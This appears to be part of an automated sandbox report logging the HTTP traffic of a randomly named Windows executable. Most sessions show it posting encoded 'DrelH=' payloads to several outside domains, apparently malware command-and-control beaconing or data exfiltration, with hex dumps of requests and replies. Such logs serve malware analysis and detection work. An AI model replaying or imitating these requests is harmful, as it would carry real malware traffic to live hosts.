                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 79 75 6b 72 62 70 76 35 71 32 69 59 4b 50 76 2f 49 4d 4b 72 79 62 72 49 45 62 31 48 58 48 49 47 76 54 78 4f 35 57 54 33 62 70 49 58 31 54 37 6d 4d 43 37 62 34 4f 34 4a 34 45 2b 4b 79 46 54 72 35 62 2b 6b 75 6e 74 50 31 36 4c 4f 48 78 6f 4f 52 72 59 71 75 4f 77 44 61 46 72 32 51 42 30 61 65 57 77 48 56 6c 56 4b 6f 61 2b 2f 37 48 75 6c 47 41 67 30 36 4d 55 54 56 54 36 65 77 6d 75 41 52 72 70 4a 70 72 5a 79 2b 56 33 6e 32 52 47 61 41 54 36 63 5a 47 77 6b 62 69 7a 54 35 6d 70 33 53 58 54 44 4d 6f 61 2b 52 36 65 4e 45 50 65 4d 66 44 75 4d 76 64 75 43 4b 35 53 65 42 71 51 6d 37 76 57 74 78 45 37 57 55 4d 6b 42 32 4a 42 75
                                                                                                                                  Data Ascii: DrelH=aRJkG/xjeaxIyukrbpv5q2iYKPv/IMKrybrIEb1HXHIGvTxO5WT3bpIX1T7mMC7b4O4J4E+KyFTr5b+kuntP16LOHxoORrYquOwDaFr2QB0aeWwHVlVKoa+/7HulGAg06MUTVT6ewmuARrpJprZy+V3n2RGaAT6cZGwkbizT5mp3SXTDMoa+R6eNEPeMfDuMvduCK5SeBqQm7vWtxE7WUMkB2JBu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 53226 | 94.23.162.163 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe

Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:58:07.880064011 CEST | 1787 | OUT | POST /v2k8/ HTTP/1.1
Host: www.drevohome.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.drevohome.shop
Referer: http://www.drevohome.shop/v2k8/
Content-Length: 1242
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 61 52 4a 6b 47 2f 78 6a 65 61 78 49 79 75 6b 72 62 70 76 35 71 32 69 59 4b 50 76 2f 49 4d 4b 72 79 62 72 49 45 62 31 48 58 48 51 47 76 68 70 4f 34 78 50 33 61 70 49 58 72 44 37 6a 4d 43 36 48 34 4b 55 56 34 45 43 77 79 47 72 72 34 35 32 6b 35 43 5a 50 37 36 4c 4f 4b 52 6f 4c 62 4c 59 37 75 4b 73 48 61 46 37 32 51 42 30 61 65 55 6f 48 51 45 56 4b 71 61 2b 38 74 33 75 70 43 41 68 68 36 4d 4e 73 56 54 33 70 7a 58 4f 41 52 4c 35 4a 72 5a 78 79 6b 56 33 6c 31 52 47 43 41 54 32 48 5a 47 74 62 62 69 76 35 35 6b 35 33 44 78 2b 37 65 4c 71 6f 48 62 57 79 47 75 47 2f 48 55 71 69 74 4b 44 30 41 36 47 5a 41 5a 30 4b 77 49 2b 78 30 6d 79 37 56 4c 6f 6d 67 76 6b 41 6d 45 34 79 4e 50 65 35 39 59 6e 4a 73 4e 39 46 2b 52 65 32 6d 35 68 4f 64 39 66 67 31 59 51 36 75 6f 44 67 73 4c 6c 62 79 75 50 4c 6e 39 73 64 35 6f 54 2b 32 68 58 57 69 76 49 36 33 58 76 77 4e 71 4c 57 32 65 34 4c 4c 36 42 34 31 53 77 32 57 6c 4c 79 66 38 50 6f 5a 45 6a 68 74 71 69 74 48 65 50 63 4c 79 62 49 79 78 4d 69 6a 69 31 75 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=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 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 53227 | 94.23.162.163 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe

Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:58:10.417376995 CEST | 483 | OUT | GET /v2k8/?DrelH=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM6qnxKBkcbq4MueVVV3XCfWAmAkUYQmNwrZeqvG2HfhRonQ==&Sx=gnM4ZH HTTP/1.1
Host: www.drevohome.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 22, 2024 22:58:11.229274035 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 22 Oct 2024 20:58:11 GMT
Content-Type: text/html
Content-Length: 7468
Last-Modified: Thu, 08 Apr 2021 14:34:06 GMT
Connection: close
ETag: "606f145e-1d2c"
Accept-Ranges: bytes
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 6f 64 70 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 20 70 65 6e 64 69 6e 67 20 49 43 41 4e 4e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 61 6e 64 20 69 73 20 73 75 73 70 65 6e 64 65 64 2e 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 65 79 2d 53 79 73 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp" /> <meta name="description" content="This domain has a pending ICANN verification and is suspended." /> <meta name="keywords" content="" /> <meta name="author" content="Key-Systems GmbH | CM" /> <meta name="publisher" content="Key-Systems GmbH" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/screen.css"> <link rel="shortcut icon" href="assets/img/favicon.png"> <title>Contact Verification Suspension Page</title></head><body><header><div class="overlay bright"></div><div class="container"><div class="heading"><div class="row"><
Oct 22, 2024 22:58:11.229335070 CEST | 1236 | IN | Data Raw: 68 31 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 75 73 70 65 6e 64 65 64 20 64 75 65 20 74 6f 20 6e 6f 6e 2d 63 6f 6d 70 6c 65 74 69 6f 6e 20 6f 66 20 61 6e 20 49 43 41 4e 4e 2d 6d 61 6e 64 61 74 65 64 20 63 6f 6e 74 61
Data Ascii: h1>This domain has been suspended due to non-completion of an ICANN-mandated contact verification.</h1><p>As part of the ongoing effort to improve contact quality, the Internet Corporation for Assigned Names and Numbers (ICANN) requires
Oct 22, 2024 22:58:11.229372978 CEST | 1236 | IN | Data Raw: 6f 6d 61 69 6e 20 72 65 67 69 73 74 72 61 6e 74 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 6f 72 20 63 68 61 6e 67 65 64 20 62 75 74 20 6e 6f 74 20 76 65 72 69 66 69 65 64 20 79 65 74 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 0d 0a 09 09
Data Ascii: omain registrant has been modified or changed but not verified yet.</span><br>Changing the email address of the domain registrant requires a verification.</li><li><i class="fa fa-play"></i><span class="bold">The domain has recent
Oct 22, 2024 22:58:11.229408979 CEST | 1236 | IN | Data Raw: 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 5f 6c 65 66 74 22 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09
Data Ascii: v class="icon_left"><span class="fa fa-check-circle"></span></div><div class="slice_content"><p><span class="bold">Click the link provided in the verification email sent to you by your Registrar or direct service provide
Oct 22, 2024 22:58:11.229445934 CEST | 1236 | IN | Data Raw: 72 2c 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 70 72 6f 76 69 64 65 72 20 6d 69 67 68 74 20 70 72 6f 76 69 64 65 20 74 68 65 20 72 65 73 70 65 63 74 69 76 65 20 74 72 69 67 67 65 72 20 63 6f 64 65 20 75 6e 64 65 72 20 63 65 72 74 61 69 6e 20 63 6f
Data Ascii: r, your domain provider might provide the respective trigger code under certain conditions. This trigger code can be entered on <a href="http://emailverification.info/">http://emailverification.info/</a> to verify your registrant contact data
Oct 22, 2024 22:58:11.229480982 CEST | 1236 | IN | Data Raw: 2f 2f 77 77 77 2e 69 63 61 6e 6e 2e 6f 72 67 2f 72 65 73 6f 75 72 63 65 73 2f 70 61 67 65 73 2f 6e 6f 6e 2d 72 65 73 70 6f 6e 73 65 2d 32 30 31 34 2d 30 31 2d 32 39 2d 65 6e 3c 2f 61 3e 3c 2f 70 3e 0d 0a 0d 0a 09 09 09 09 3c 70 3e 3c 73 70 61 6e
Data Ascii: //www.icann.org/resources/pages/non-response-2014-01-29-en</a></p><p><span class="bold">How can I prevent deactivation of my domain in the future?</span><br>This requires the completion of the verification process within 15 days
Oct 22, 2024 22:58:11.229517937 CEST | 296 | IN | Data Raw: 63 61 6e 20 49 20 64 6f 3f 3c 2f 73 70 61 6e 3e 3c 62 72 3e 0d 0a 09 09 09 09 49 66 20 79 6f 75 20 61 72 65 20 61 20 76 69 73 69 74 6f 72 20 74 6f 20 74 68 69 73 20 77 65 62 73 69 74 65 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 63 63 65 73 73 69
Data Ascii: can I do?</span><br>If you are a visitor to this website, please try accessing this domain again later.</p></div>.../slice_content--></div>.../slice--></div>.../col-sm-8--></div>.../row--><footer><a href="legal


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 53228 | 103.224.182.242 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe

Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:58:16.684567928 CEST | 759 | OUT | POST /1juc/ HTTP/1.1
Host: www.givingaway123.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.givingaway123.net
Referer: http://www.givingaway123.net/1juc/
Content-Length: 206
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 66 66 54 6f 6a 4c 64 6e 42 2f 42 54 63 55 71 4c 7a 59 68 41 2f 4b 6c 6a 57 6e 49 6e 7a 32 66 71 6a 74 62 47 41 6d 54 4f 2f 63 32 78 4f 75 72 32 63 76 30 74 63 78 77 4a 32 58 4e 56 41 66 6f 4f 36 53 63 2b 46 57 74 39 4f 6b 74 79 44 30 71 44 36 78 53 7a 38 4e 47 48 78 62 33 70 58 53 66 62 53 46 57 64 39 64 6c 4b 4d 45 75 44 41 6f 78 4e 66 70 64 45 77 57 6e 2b 6a 56 32 75 33 4d 4d 58 33 31 36 39 55 42 76 49 58 6a 43 72 63 39 6d 5a 31 66 52 35 46 52 51 68 4a 79 63 6d 73 37 49 32 47 69 68 48 43 2f 36 36 4a 65 62 6c 72 48 50 48 77 68 33 30 53 75 6f 63 33 78 42 47 4e 4e 47 64 79 41 39 41 7a 72 4d 3d
                                                                                                                                  Data Ascii: DrelH=ffTojLdnB/BTcUqLzYhA/KljWnInz2fqjtbGAmTO/c2xOur2cv0tcxwJ2XNVAfoO6Sc+FWt9OktyD0qD6xSz8NGHxb3pXSfbSFWd9dlKMEuDAoxNfpdEwWn+jV2u3MMX3169UBvIXjCrc9mZ1fR5FRQhJycms7I2GihHC/66JeblrHPHwh30Suoc3xBGNNGdyA9AzrM=
Oct 22, 2024 22:58:17.349528074 CEST | 877 | IN | HTTP/1.1 200 OK
date: Tue, 22 Oct 2024 20:58:17 GMT
server: Apache
set-cookie: __tad=1729630697.6660268; expires=Fri, 20-Oct-2034 20:58:17 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 582
content-type: text/html; charset=UTF-8
connection: close


Session ID: 26, Source IP: 192.168.2.5, Source Port: 53229, Destination IP: 103.224.182.242, Destination Port: 80, PID: 1536, Process: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp: Oct 22, 2024 22:58:19.249036074 CEST, Bytes transferred: 779, Direction: OUT
Data: POST /1juc/ HTTP/1.1
Host: www.givingaway123.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.givingaway123.net
Referer: http://www.givingaway123.net/1juc/
Content-Length: 226
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: DrelH=ffTojLdnB/BTd0aLx/VA5qliaHInlGfujtfGAnHe/OixOOb2dtctfxwJxnNQevoR6SRDFXR9Og9yD1aD6C609dGB973nYyfbSFWd9cBkME2DAYhNcMpH+2n5zF2uzMMb316bUADuXhKrc92ZyOR4eBQnWidMt45YPxB0KNm4IuTFqxitqD/cBOEkniJxc9n0ojtwt8YthB7c6ObPwS4GRZBUaA/D
Timestamp: Oct 22, 2024 22:58:19.920167923 CEST, Bytes transferred: 877, Direction: IN
Data: HTTP/1.1 200 OK
date: Tue, 22 Oct 2024 20:58:19 GMT
server: Apache
set-cookie: __tad=1729630699.8206090; expires=Fri, 20-Oct-2034 20:58:19 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 582
content-type: text/html; charset=UTF-8
connection: close
Timestamp: Oct 22, 2024 22:58:20.192421913 CEST, Bytes transferred: 877, Direction: IN
Data: HTTP/1.1 200 OK
date: Tue, 22 Oct 2024 20:58:19 GMT
server: Apache
set-cookie: __tad=1729630699.8206090; expires=Fri, 20-Oct-2034 20:58:19 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 582
content-type: text/html; charset=UTF-8
connection: close


Session ID: 27, Source IP: 192.168.2.5, Source Port: 53230, Destination IP: 103.224.182.242, Destination Port: 80, PID: 1536, Process: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp: Oct 22, 2024 22:58:21.947407007 CEST, Bytes transferred: 1796, Direction: OUT
Data: POST /1juc/ HTTP/1.1
Host: www.givingaway123.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.givingaway123.net
Referer: http://www.givingaway123.net/1juc/
Content-Length: 1242
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Timestamp: Oct 22, 2024 22:58:22.596883059 CEST, Bytes transferred: 877, Direction: IN
Data: HTTP/1.1 200 OK
date: Tue, 22 Oct 2024 20:58:22 GMT
server: Apache
set-cookie: __tad=1729630702.4699844; expires=Fri, 20-Oct-2034 20:58:22 GMT; Max-Age=315360000
vary: Accept-Encoding
content-encoding: gzip
content-length: 582
content-type: text/html; charset=UTF-8
connection: close


Session ID: 28, Source IP: 192.168.2.5, Source Port: 53231, Destination IP: 103.224.182.242, Destination Port: 80, PID: 1536, Process: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp: Oct 22, 2024 22:58:24.480096102 CEST, Bytes transferred: 486, Direction: OUT
Data: GET /1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D8s2i/Pv/RCSFWjqZ6c9XIS2ZXqJQLcds/lvq2BX8pMITrA==&Sx=gnM4ZH HTTP/1.1
Host: www.givingaway123.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Timestamp: Oct 22, 2024 22:58:25.173501015 CEST, Bytes transferred: 1236, Direction: IN
Data: HTTP/1.1 200 OK
date: Tue, 22 Oct 2024 20:58:25 GMT
server: Apache
set-cookie: __tad=1729630705.7903887; expires=Fri, 20-Oct-2034 20:58:25 GMT; Max-Age=315360000
vary: Accept-Encoding
content-length: 1527
content-type: text/html; charset=UTF-8
connection: close
Data Ascii: <html><head><title>givingaway123.net</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.givingaway123.net/1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D8s2i/Pv/RCSFWjqZ6c9XIS2ZXqJQLcds/lvq2BX8pMITrA==&Sx=gnM4ZH&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body
Timestamp: Oct 22, 2024 22:58:25.173566103 CEST, Bytes transferred: 563, Direction: IN
Data Ascii: bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.givingaway123.net/1juc/?DrelH=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D8s2i/Pv/RCSFWjqZ6c9XIS2ZXqJQLcds/lvq2BX8pMITrA=


Session ID: 29, Source IP: 192.168.2.5, Source Port: 53232, Destination IP: 209.74.64.187, Destination Port: 80, PID: 1536, Process: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp: Oct 22, 2024 22:58:30.253508091 CEST, Bytes transferred: 744, Direction: OUT
Data: POST /qxse/ HTTP/1.1
Host: www.jagdud.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.jagdud.store
Referer: http://www.jagdud.store/qxse/
Content-Length: 206
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Ascii: DrelH=mrFM9RmSUx+2nMoPSBNnJIP7YQi1AJ8U4LqqyC2ucNfYSlscDJdsrscaMDkk3LFBi9fzV57NsS+fH9ChSltTevGEjMWvLtO98WdWhif3uwxHuGmcnQRzKJjowzSC0iv10y6VqLvyhfVPuiWGir2dSv/15Kg3gxGCQn1VVnekaqsvsrsD2JnGmcwXubzieGcLszk9r2s=
Timestamp: Oct 22, 2024 22:58:30.917712927 CEST, Bytes transferred: 533, Direction: IN
Data: HTTP/1.1 404 Not Found
Date: Tue, 22 Oct 2024 20:58:30 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 30, Source IP: 192.168.2.5, Source Port: 53233, Destination IP: 209.74.64.187, Destination Port: 80, PID: 1536, Process: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp: Oct 22, 2024 22:58:32.799354076 CEST, Bytes transferred: 764, Direction: OUT
Data: POST /qxse/ HTTP/1.1
Host: www.jagdud.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.jagdud.store
Referer: http://www.jagdud.store/qxse/
Content-Length: 226
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6d 72 46 4d 39 52 6d 53 55 78 2b 32 6d 73 59 50 65 43 6c 6e 63 34 4f 4a 47 67 69 31 4a 70 38 51 34 4c 32 71 79 41 61 2b 66 2f 37 59 56 41 6f 63 52 62 31 73 6d 4d 63 61 56 7a 6b 6c 39 72 46 61 69 39 43 4d 56 37 2f 4e 73 53 36 66 48 38 79 68 54 57 31 53 64 66 47 43 36 63 57 74 56 64 4f 39 38 57 64 57 68 69 61 53 75 78 5a 48 75 33 57 63 6f 52 52 38 55 5a 6a 72 36 54 53 43 35 43 76 35 30 79 36 4e 71 4f 48 59 68 64 39 50 75 6e 36 47 69 36 32 53 62 76 2f 2f 30 71 68 6a 72 6b 72 52 53 68 35 75 66 45 76 36 62 63 67 58 70 64 42 70 73 72 76 75 31 38 63 76 2b 49 37 56 50 32 39 69 32 51 30 4e 31 68 35 31 51 2b 31 68 67 46 59 35 79 6c 66 34 48 6a 70 63 48 6d 53 30
                                                                                                                                  Data Ascii: DrelH=mrFM9RmSUx+2msYPeClnc4OJGgi1Jp8Q4L2qyAa+f/7YVAocRb1smMcaVzkl9rFai9CMV7/NsS6fH8yhTW1SdfGC6cWtVdO98WdWhiaSuxZHu3WcoRR8UZjr6TSC5Cv50y6NqOHYhd9Pun6Gi62Sbv//0qhjrkrRSh5ufEv6bcgXpdBpsrvu18cv+I7VP29i2Q0N1h51Q+1hgFY5ylf4HjpcHmS0
Oct 22, 2024 22:58:33.478702068 CEST | 533 | IN | HTTP/1.1 404 Not Found
Date: Tue, 22 Oct 2024 20:58:33 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 53234 | 209.74.64.187 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:58:35.347170115 CEST | 1781 | OUT | POST /qxse/ HTTP/1.1
Host: www.jagdud.store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.jagdud.store
Referer: http://www.jagdud.store/qxse/
Content-Length: 1242
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6d 72 46 4d 39 52 6d 53 55 78 2b 32 6d 73 59 50 65 43 6c 6e 63 34 4f 4a 47 67 69 31 4a 70 38 51 34 4c 32 71 79 41 61 2b 66 2f 7a 59 56 32 55 63 44 73 70 73 6e 4d 63 61 64 54 6b 6f 39 72 45 41 69 39 61 41 56 37 7a 43 73 52 53 66 48 61 75 68 62 48 31 53 4b 76 47 43 31 38 57 77 4c 74 4f 6b 38 57 4e 53 68 69 4b 53 75 78 5a 48 75 30 2b 63 68 67 52 38 54 70 6a 6f 77 7a 53 47 30 69 75 73 30 79 79 7a 71 4f 44 69 68 74 64 50 76 48 71 47 6a 49 65 53 55 76 2f 78 7a 71 68 72 72 6b 75 4a 53 6e 64 54 66 46 62 63 62 62 6b 58 6f 64 45 4a 34 71 4b 7a 70 66 73 59 38 61 36 30 4f 6d 39 6d 6f 6a 49 74 2b 6d 4e 74 63 2f 31 78 6a 7a 67 69 77 46 57 49 54 53 56 56 46 51 62 4b 6a 55 57 67 67 39 43 70 77 53 31 4d 49 56 75 70 42 39 64 34 34 39 2b 35 33 64 4d 61 34 67 4d 47 57 6e 52 64 57 2b 70 77 6e 41 69 50 6d 51 39 74 65 74 68 4f 30 2f 72 70 48 6e 53 73 